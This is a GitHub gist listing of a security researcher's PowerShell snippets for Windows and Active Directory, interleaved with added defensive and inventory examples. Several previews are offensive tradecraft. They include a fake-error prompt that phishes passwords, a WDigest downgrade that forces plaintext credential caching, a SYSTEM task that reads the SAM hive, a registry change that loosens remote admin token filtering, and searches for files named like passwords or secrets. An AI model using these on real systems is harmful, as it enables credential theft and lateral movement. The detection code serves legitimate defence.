Will (@HarmJ0y)
Coding towards chaotic good while living on the decision boundary

HarmJ0y / rotate.ps1
Last active August 31, 2022 17:20
PowerShell binary rotate right/left on individual bytes
function Rotate-Byte {
<#
.SYNOPSIS
Performs left/right binary rotation on individual bytes.
Author: @harmj0y
.DESCRIPTION
Implements the logic to perform per-byte binary rotates right and left.
@HarmJ0y
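The listing shows only the help block of rotate.ps1. The following is an added example of a per-byte rotate written for this page, not the gist's own implementation: it rotates every byte of a byte array left or right by a bit count, promotes to int so the shift cannot be truncated before the mask, and checks itself by round-tripping a constructed sample string and two hand-computed values. The function name Invoke-ByteRotate is mine.

```powershell
function Invoke-ByteRotate {
    <#
    .SYNOPSIS
    Rotates each input byte left or right by -Count bits (0..7). Added example, not the gist's code.
    #>
    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $true, ValueFromPipeline = $true)]
        [byte[]]$Bytes,
        [ValidateRange(0, 7)]
        [int]$Count = 1,
        [switch]$Left
    )
    process {
        foreach ($b in $Bytes) {
            # Work on an int: a [byte] shifted left would lose its high bits before we can wrap them round
            $v = [int]$b
            if ($Left) {
                $r = (($v -shl $Count) -bor ($v -shr (8 - $Count))) -band 0xFF
            }
            else {
                $r = (($v -shr $Count) -bor ($v -shl (8 - $Count))) -band 0xFF
            }
            [byte]$r
        }
    }
}

# Self-check on a constructed sample: rotate right by 3, rotate back left by 3, expect the original text
$Plain   = [System.Text.Encoding]::ASCII.GetBytes('rotate me')
$Encoded = Invoke-ByteRotate -Bytes $Plain -Count 3
$Decoded = Invoke-ByteRotate -Bytes $Encoded -Count 3 -Left
if ([System.Text.Encoding]::ASCII.GetString($Decoded) -ne 'rotate me') { throw 'round trip failed' }

# 0x81 is 1000 0001: one rotate left wraps the top bit down to give 0000 0011 (0x03),
# one rotate right wraps the bottom bit up to give 1100 0000 (0xC0)
if ((Invoke-ByteRotate -Bytes 0x81 -Count 1 -Left) -ne 0x03) { throw 'rotl check failed' }
if ((Invoke-ByteRotate -Bytes 0x81 -Count 1) -ne 0xC0) { throw 'rotr check failed' }

# Show the encoded bytes as hex
($Encoded | ForEach-Object { $_.ToString('X2') }) -join ' '
```

The `-shl`/`-shr` operators need PowerShell 3 or later; the count is capped at 7 because rotating an 8-bit value by 8 is the identity and larger counts should be reduced modulo 8 by the caller.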
HarmJ0y / ShareAudit.ps1
Created February 7, 2016 03:17
ShareAudit.ps1
#requires -version 2
<#
PowerSploit File: PowerView.ps1
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
HarmJ0y / dc_cert_template.ps1
Created September 13, 2021 21:43
DC Certificate Template Enumeration
# Domain controllers are the computer objects with userAccountControl bit 8192 (SERVER_TRUST_ACCOUNT) set
$Results = ([adsisearcher]"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))").FindAll() | % {
    $Entry = $_.GetDirectoryEntry()
    $SAM = $Entry.samAccountName[0]
    $DN = $Entry.distinguishedName[0]
    try {
        # userCertificate holds the DC's DER-encoded certificate; parse it so the expiry and extensions can be read
        $Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($Entry.userCertificate)
        $Exp = $Cert.GetExpirationDateString()
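The expiry alone does not tell you which template issued a DC's certificate; that information sits in two Microsoft-specific extensions, the v1 "Certificate Template Name" (OID 1.3.6.1.4.1.311.20.2) and the v2+ "Certificate Template Information" (OID 1.3.6.1.4.1.311.21.7). The following added example (written for this page, not the gist's code) reads both for every DC, copes with DCs that have no userCertificate or several, and reports the template next to the expiry. It assumes Windows PowerShell on a domain-joined host, since X509Extension.Format relies on the Windows crypto formatter; the function name Get-DCCertificateTemplate is mine.

```powershell
function Get-DCCertificateTemplate {
    <#
    .SYNOPSIS
    Lists each domain controller's userCertificate value(s) with expiry and issuing template. Added example.
    #>
    [CmdletBinding()]
    param()

    # Extensions AD CS stamps into enrolled certificates
    $TemplateNameOid = '1.3.6.1.4.1.311.20.2'   # v1 templates: plain template name
    $TemplateInfoOid = '1.3.6.1.4.1.311.21.7'   # v2+ templates: template OID plus major/minor version

    # userAccountControl bit 8192 = SERVER_TRUST_ACCOUNT, i.e. a domain controller
    $Searcher = [adsisearcher]'(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))'
    $null = $Searcher.PropertiesToLoad.AddRange([string[]]@('samAccountName', 'distinguishedName', 'userCertificate'))

    foreach ($Result in $Searcher.FindAll()) {
        $Props = $Result.Properties
        $SAM = $Props['samaccountname'][0]
        $DN  = $Props['distinguishedname'][0]

        # userCertificate is multi-valued; each value is one DER-encoded certificate (an absent attribute gives an empty collection)
        $Blobs = @($Props['usercertificate'])
        if ($Blobs.Count -eq 0) {
            [PSCustomObject]@{ DC = $SAM; DN = $DN; Subject = $null; NotAfter = $null; Template = 'no userCertificate'; TemplateId = $null }
            continue
        }
        foreach ($Blob in $Blobs) {
            try {
                $Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 -ArgumentList (,[byte[]]$Blob)
            }
            catch {
                Write-Warning "$SAM : could not parse a userCertificate value ($($_.Exception.Message))"
                continue
            }
            $NameExt = $Cert.Extensions | Where-Object { $_.Oid.Value -eq $TemplateNameOid } | Select-Object -First 1
            $InfoExt = $Cert.Extensions | Where-Object { $_.Oid.Value -eq $TemplateInfoOid } | Select-Object -First 1

            # Format($false) renders the extension on one line: the bare name for v1 templates, or
            # "Template=<oid or FriendlyName(oid)>, Major Version Number=..., Minor Version Number=..." for v2+
            $Template = $null; $TemplateId = $null
            if ($NameExt) { $Template = $NameExt.Format($false) }
            if ($InfoExt) {
                $Text = $InfoExt.Format($false)
                if ($Text -match 'Template=([^,]+)') { $TemplateId = $Matches[1].Trim() }
                if (-not $Template) { $Template = $Text }
            }
            [PSCustomObject]@{
                DC         = $SAM
                DN         = $DN
                Subject    = $Cert.Subject
                NotAfter   = $Cert.NotAfter
                Template   = $Template
                TemplateId = $TemplateId
            }
        }
    }
}

Get-DCCertificateTemplate | Sort-Object NotAfter | Format-Table DC, Subject, NotAfter, Template, TemplateId -AutoSize
```

A DC that carries no userCertificate at all, or one issued from a template other than the expected Domain Controller / Domain Controller Authentication / Kerberos Authentication family, is worth a second look either way: it may be a DC that never enrolled, or one that enrolled from a template you did not expect to be able to issue server-authentication certificates.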
HarmJ0y / wmi_dns.ps1
Last active August 31, 2022 17:21
wmi_dns
# Get all zones:
Get-WmiObject MicrosoftDNS_Zone -Namespace Root\MicrosoftDNS -ComputerName primary.testlab.local | Select ContainerName

# Get all A records from a zone (the " A " match on the text form keeps AAAA records out):
Get-WmiObject -Namespace Root\MicrosoftDNS -Query "SELECT * FROM MicrosoftDNS_ResourceRecord WHERE ContainerName='testlab.local'" -ComputerName primary.testlab.local | ?{$_.TextRepresentation -match " A "} | Select -Expand TextRepresentation
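Matching on TextRepresentation is fine for a quick look, but the typed classes under Root\MicrosoftDNS (MicrosoftDNS_AType, MicrosoftDNS_CNAMEType and so on) expose the owner name and record data as properties, so there is nothing to parse. The following added example, my code rather than the gist's, walks every real zone on the server (skipping the root-hints and cache pseudo-zones and TrustAnchors), pulls the requested record types per zone, and returns one object per record. The server name is the gist's placeholder and is assumed.

```powershell
function Get-DnsZoneRecords {
    <#
    .SYNOPSIS
    Enumerates DNS zones and their records over WMI (Root\MicrosoftDNS) on a Windows DNS server. Added example.
    #>
    param(
        [Parameter(Mandatory = $true)]
        [string]$ComputerName,
        # record types to pull; each maps to a MicrosoftDNS_<Type>Type WMI class
        [string[]]$RecordType = @('A', 'AAAA', 'CNAME', 'SRV')
    )
    $Ns = 'Root\MicrosoftDNS'

    # Built-in pseudo-zones ("..RootHints", "..Cache") and TrustAnchors are not data you want in an inventory
    $Zones = Get-WmiObject -Namespace $Ns -Class MicrosoftDNS_Zone -ComputerName $ComputerName |
        Where-Object { $_.ContainerName -notmatch '^\.\.' -and $_.ContainerName -ne 'TrustAnchors' }

    foreach ($Zone in $Zones) {
        foreach ($Type in $RecordType) {
            $Class = "MicrosoftDNS_${Type}Type"
            # Escape single quotes so a zone name cannot break out of the WQL string literal
            $Container = $Zone.ContainerName -replace "'", "''"
            $Query = "SELECT OwnerName, RecordData, TTL FROM $Class WHERE ContainerName='$Container'"
            Get-WmiObject -Namespace $Ns -Query $Query -ComputerName $ComputerName -ErrorAction SilentlyContinue |
                ForEach-Object {
                    [PSCustomObject]@{
                        Zone         = $Zone.ContainerName
                        ZoneType     = $Zone.ZoneType
                        DsIntegrated = $Zone.DsIntegrated
                        Type         = $Type
                        Owner        = $_.OwnerName
                        # IP address for A/AAAA, target host for CNAME, "priority weight port target" for SRV
                        Data         = $_.RecordData
                        TTL          = $_.TTL
                    }
                }
        }
    }
}

# Usage (assumed host name): every A record the server holds, grouped by zone
Get-DnsZoneRecords -ComputerName primary.testlab.local -RecordType A | Format-Table Zone, Owner, Data, TTL -AutoSize
```

Querying the WMI provider needs the DNS Server WMI namespace to be reachable (RPC/DCOM to the server) and membership in DnsAdmins or local Administrators on that server; on a DC the ContainerName of an AD-integrated zone is the zone name, and DsIntegrated tells you whether the records actually live in the directory.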
HarmJ0y / Powershell-File-Listings.txt
Created May 15, 2014 20:59
Powershell file listings
# all files in sortable csv
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue | where {!$_.PSIsContainer} | select-object FullName, @{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}}, LastAccessTime, LastWriteTime, Length | export-csv -notypeinformation -path files.csv"
# grep for specific file types
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*.doc*','*.xls*','*.pdf')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
# grep for specific key words in file names
powershell.exe -command "get-childitem .\ -rec -ErrorAction SilentlyContinue -include @('*password*','*sensitive*','*secret*')|where{!$_.PSIsContainer}|select-object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,Length|export-csv -notypeinformation -path files.csv"
HarmJ0y / psremoting.ps1
Last active August 31, 2022 17:24
Enable PSRemoting
# Run winrm quickconfig with defaults (starts WinRM, sets it to start automatically, adds an HTTP listener and a firewall exception)
echo Y | winrm quickconfig
# Run Enable-PSRemoting with defaults
Enable-PSRemoting -Force
# Disable UAC remote restrictions: local accounts in the Administrators group get a full token over the network
# (needed for remoting as a non-built-in local admin; the same setting is what makes those accounts usable for lateral movement)
Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
# Enable Trusted Hosts for universal access
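The comment the preview ends on points at TrustedHosts for universal access, which together with LocalAccountTokenFilterPolicy=1 is a convenient lab setup and a generous foothold for whoever lands on the box next. The following added example (mine, not the gist's) performs the same enablement but scopes TrustedHosts to named hosts, makes the token-filter change opt-in, and then reads back what is actually in effect instead of assuming the commands succeeded. The jump-host names and the function name Enable-ScopedPSRemoting are assumed.

```powershell
function Enable-ScopedPSRemoting {
    <#
    .SYNOPSIS
    Enables WinRM/PSRemoting with TrustedHosts limited to named hosts and reports the resulting state. Added example.
    #>
    [CmdletBinding()]
    param(
        # Hosts this client is allowed to send NTLM/Basic/CredSSP credentials to when Kerberos is not used.
        # '*' means any name an attacker can point you at.
        [Parameter(Mandatory = $true)]
        [string[]]$TrustedHost,
        # Disable UAC remote restrictions so local Administrators-group members get a full token over the network
        [switch]$AllowLocalAdminRemoteLogon
    )
    # On a Public network profile this refuses to run without -SkipNetworkProfileCheck; that refusal is usually right
    Enable-PSRemoting -Force | Out-Null

    # TrustedHosts is a single comma-separated string, not an array
    Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value ($TrustedHost -join ',') -Force

    $PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    if ($AllowLocalAdminRemoteLogon) {
        Set-ItemProperty -Path $PolicyKey -Name LocalAccountTokenFilterPolicy -Value 1 -Type DWord
    }

    # Read the live configuration back: listeners, trust list, token policy, and whether WSMan answers locally
    $Listeners = Get-ChildItem WSMan:\localhost\Listener | ForEach-Object {
        (Get-ChildItem $_.PSPath |
            Where-Object { $_.Name -in @('Transport', 'Address', 'Port') } |
            ForEach-Object { "$($_.Name)=$($_.Value)" }) -join ' '
    }
    $Tfp = (Get-ItemProperty -Path $PolicyKey -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue).LocalAccountTokenFilterPolicy
    $TfpText = if ($null -eq $Tfp) { 'not set (UAC remote restrictions apply)' } else { "$Tfp" }

    [PSCustomObject]@{
        Service           = (Get-Service WinRM).Status
        Listeners         = $Listeners
        TrustedHosts      = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
        TokenFilterPolicy = $TfpText
        LocalWSManAnswers = ($null -ne (Test-WSMan -ErrorAction SilentlyContinue))
    }
}

# Usage (assumed host names): trust two jump hosts only, leave the token filter policy alone
Enable-ScopedPSRemoting -TrustedHost 'jump01.testlab.local', 'jump02.testlab.local'
```

Run it from an elevated prompt. If the report shows a Transport=HTTP listener bound to Address=* and a wildcard in TrustedHosts, the box is in the same state the one-liners above leave it in; the defensible configuration is an HTTPS listener, an explicit trust list, and the token filter policy left unset unless a specific local-admin workflow needs it.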
HarmJ0y / Invoke-WdigestDowngrade.ps1
Created May 22, 2015 16:33
Invoke-WdigestDowngrade
function Invoke-LockWorkStation {
    # region define P/Invoke types dynamically
    # stolen from PowerSploit https://github.com/mattifestation/PowerSploit/blob/master/Mayhem/Mayhem.psm1
    # thanks matt and chris :)
    # Reflection.Emit builds the P/Invoke type in memory; Add-Type would write a .cs file to disk and spawn csc.exe
    $DynAssembly = New-Object System.Reflection.AssemblyName('Win32')
    $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32', $False)
    $TypeBuilder = $ModuleBuilder.DefineType('Win32.User32', 'Public, Class')
    $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
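The gist's name says what the lock is for: once WDigest is told to keep logon credentials, the user has to authenticate again before LSASS holds anything to read, and locking the workstation forces exactly that. The switch is the UseLogonCredential value under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. The following added example (mine, not the gist's) is the defender's side: it reads that value and decides whether plaintext caching is in effect on this build, because the meaning of an absent value differs between Windows 8.1 / Server 2012 R2 and later (caching off unless set to 1) and older builds (caching on unless KB2871997 is installed and the value is set to 0). The function name Get-WDigestCredentialCaching is mine.

```powershell
function Get-WDigestCredentialCaching {
    <#
    .SYNOPSIS
    Reports whether WDigest will keep plaintext logon credentials in LSASS on this host. Added example.
    #>
    [CmdletBinding()]
    param()
    $Key  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $Name = 'UseLogonCredential'

    # $null when the value (or the key) does not exist
    $Value = (Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue).$Name
    $Build = [Environment]::OSVersion.Version.Build
    # KB2871997 back-ports the UseLogonCredential switch to Windows 7 / 8 / 2008 R2 / 2012
    $HasKb = $null -ne (Get-HotFix -Id KB2871997 -ErrorAction SilentlyContinue)

    if ($Build -ge 9600) {
        # Windows 8.1 / Server 2012 R2 (build 9600) and later: off unless explicitly 1
        $Caching = ($Value -eq 1)
        $Reason  = if ($null -eq $Value) { 'value absent; default is no caching on this build' } else { "UseLogonCredential=$Value" }
    }
    elseif ($HasKb) {
        # Older build with the update: on unless explicitly 0
        $Caching = ($Value -ne 0)
        $Reason  = if ($null -eq $Value) { 'KB2871997 present but value absent; caching stays on until set to 0' } else { "UseLogonCredential=$Value" }
    }
    else {
        $Caching = $true
        $Reason  = 'pre-8.1/2012 R2 build without KB2871997; WDigest always caches'
    }

    [PSCustomObject]@{
        ComputerName       = $env:COMPUTERNAME
        Build              = $Build
        UseLogonCredential = $Value
        KB2871997          = $HasKb
        PlaintextCached    = $Caching
        Reason             = $Reason
        # An explicit 1 is the footprint a downgrade leaves; nothing legitimate sets it on a current build
        LooksDowngraded    = ($Value -eq 1)
    }
}

Get-WDigestCredentialCaching
```

On an estate this is the value to alert on, not just to audit: a registry-set event (Sysmon event 13 or a SACL on the key) for UseLogonCredential being written to 1 is a cheap, high-signal detection, and the lock-then-reauthenticate that follows is the attacker waiting for LSASS to fill up.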
HarmJ0y / prompt.ps1
Last active August 31, 2022 17:25
prompt
# Stolen/adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/
# POC from greg.foss[at]owasp.org
# Redefining prompt runs this every time a command finishes: a fake "lost the DC" error, then a credential
# dialog pre-filled with the current user's name so the victim only has to type a password
function prompt {
    Add-Type -AssemblyName Microsoft.VisualBasic
    [Microsoft.VisualBasic.Interaction]::MsgBox('Lost contact with the Domain Controller.', 'OKOnly,MsgBoxSetForeground,SystemModal,Critical', 'ERROR - 0xA801B720')
    $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name
    $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName")
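A prompt function like the one above has to come from somewhere: either it was defined in the running session or it is planted in one of the four profile scripts so it comes back on every start. The following added example (mine, not the POC's) checks both places for calls no legitimate prompt needs, which is the check to run on a user's host when they report an odd "enter your password" dialog from PowerShell. The function name Test-PromptHijack and the indicator list are mine.

```powershell
function Test-PromptHijack {
    <#
    .SYNOPSIS
    Flags a prompt function or profile script that raises credential dialogs, as the POC above does. Added example.
    #>
    [CmdletBinding()]
    param(
        # API calls a prompt function has no business making; extend as needed
        [string[]]$Indicator = @('PromptForCredential', 'Get-Credential', 'MsgBox', 'Microsoft.VisualBasic')
    )
    $Pattern = ($Indicator | ForEach-Object { [regex]::Escape($_) }) -join '|'

    # 1. The prompt function as currently defined in this session (whatever redefined it, this is what runs)
    $Prompt = Get-Command -Name prompt -CommandType Function -ErrorAction SilentlyContinue
    if ($Prompt) {
        $Body = $Prompt.ScriptBlock.ToString()
        $Hit  = if ($Body -match $Pattern) { $Matches[0] } else { $null }
        [PSCustomObject]@{
            Source        = 'function:prompt (live session)'
            DefinesPrompt = $true
            Suspicious    = ($null -ne $Hit)
            Evidence      = $Hit
        }
    }

    # 2. Every profile path; any of them can redefine prompt at startup
    foreach ($Scope in 'AllUsersAllHosts', 'AllUsersCurrentHost', 'CurrentUserAllHosts', 'CurrentUserCurrentHost') {
        $Path = $PROFILE.$Scope
        if (-not (Test-Path -LiteralPath $Path)) { continue }
        $Text = Get-Content -LiteralPath $Path -Raw
        $DefinesPrompt = $Text -match '(?im)^\s*function\s+(global:)?prompt\b'
        $Hit = if ($Text -match $Pattern) { $Matches[0] } else { $null }
        [PSCustomObject]@{
            Source        = $Path
            DefinesPrompt = $DefinesPrompt
            # Only a profile that both redefines prompt and calls into credential UI is the pattern above
            Suspicious    = ($DefinesPrompt -and $null -ne $Hit)
            Evidence      = $Hit
        }
    }
}

Test-PromptHijack | Format-Table -AutoSize
```

Run it in the user's own session (the live prompt is per-process) and as the user, since CurrentUser profile paths resolve from $PROFILE of whoever runs the check; a clean result here with a dirty prompt in the user's console means the definition came from a module or a script they dot-sourced, which `Get-Command prompt | Select-Object -ExpandProperty ScriptBlock` will still show you.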
HarmJ0y / random.ps1
Last active August 31, 2022 17:27
random data file one-liner
# Writes a ~1000 MB file of printable pseudo-random text (Get-Random, not a CSPRNG: fine for transfer tests, not for keys); each outer pass writes 4 x 256 KB
$megs=1000;$w=New-Object IO.StreamWriter "$env:temp\data.dat";[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb)}};$w.Close()
HarmJ0y / findsid.bat
Last active August 31, 2022 17:27
Win7 Powershell SID Enumeration
REM HKLM\SECURITY is readable only by SYSTEM, so run PowerShell through a one-minute scheduled task as SYSTEM:
REM the machine SID is the last 24 bytes of the V value under SAM\Domains\Account. Wait up to 60 s for the task
REM to fire (choice), then delete it; the decoded SID lands in c:\sid.txt.
schtasks /create /tn GetSid /tr "powershell.exe -c '$k=Get-Item HKLM:\security\sam\domains\account;$v=Get-ItemProperty $k.pspath;New-Object System.Security.Principal.SecurityIdentifier([Byte[]]$v.V[-24..-1],0)|Format-List *|Out-File c:\sid.txt'" /sc minute /ru System /MO 1 & choice /C X /T 60 /D X > nul & schtasks /delete /tn GetSid /f
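Why 24 bytes: a binary SID is a revision byte, a sub-authority count byte, a 6-byte identifier authority, then one 32-bit little-endian word per sub-authority, and a machine SID S-1-5-21-a-b-c has four sub-authorities (21 plus the three machine-specific values), so 2 + 6 + 4 x 4 = 24. The following added example (mine, not the gist's) decodes a constructed blob of that layout to show the carving, and then shows the route that needs no SYSTEM task at all: every local account's SID is the machine SID with a RID appended, and SecurityIdentifier.AccountDomainSid strips the RID. The sample bytes and the function names are mine.

```powershell
function ConvertFrom-SidBytes {
    <#
    .SYNOPSIS
    Decodes a binary SID after checking that the length matches the sub-authority count. Added example.
    #>
    param([Parameter(Mandatory = $true)][byte[]]$Bytes)
    # byte 0 = revision, byte 1 = number of sub-authorities, bytes 2..7 = identifier authority, then 4 bytes each
    if ($Bytes.Length -lt 8 -or $Bytes.Length -ne (8 + 4 * $Bytes[1])) {
        throw "blob length $($Bytes.Length) does not match sub-authority count $($Bytes[1])"
    }
    New-Object System.Security.Principal.SecurityIdentifier($Bytes, 0)
}

function Get-MachineSid {
    <#
    .SYNOPSIS
    Returns the local machine SID as a normal user, without touching the SAM hive. Added example.
    #>
    # Any local account will do: its SID is <machine SID>-<RID>
    $Local = Get-WmiObject Win32_UserAccount -Filter "LocalAccount=True" | Select-Object -First 1
    if (-not $Local) { throw 'no local accounts found' }
    (New-Object System.Security.Principal.SecurityIdentifier($Local.SID)).AccountDomainSid
}

# Constructed sample blob (not from a real host) for S-1-5-21-1234-5678-12345:
# revision 1, 4 sub-authorities, authority 5, then 21, 1234 (0x04D2), 5678 (0x162E), 12345 (0x3039) little-endian
$Sample = [byte[]](0x01, 0x04,
                   0x00, 0x00, 0x00, 0x00, 0x00, 0x05,
                   0x15, 0x00, 0x00, 0x00,
                   0xD2, 0x04, 0x00, 0x00,
                   0x2E, 0x16, 0x00, 0x00,
                   0x39, 0x30, 0x00, 0x00)
$Sid = ConvertFrom-SidBytes -Bytes $Sample
if ($Sid.Value -ne 'S-1-5-21-1234-5678-12345') { throw "unexpected SID $($Sid.Value)" }
$Sid.Value

# Live value for this host (requires only a standard user)
(Get-MachineSid).Value
```

The scheduled-task route still has a use: it works when you want the SID from the hive itself (for example while verifying that a cloned image really got re-SIDed) rather than trusting what the account database reports, and on a host with no local accounts left to translate.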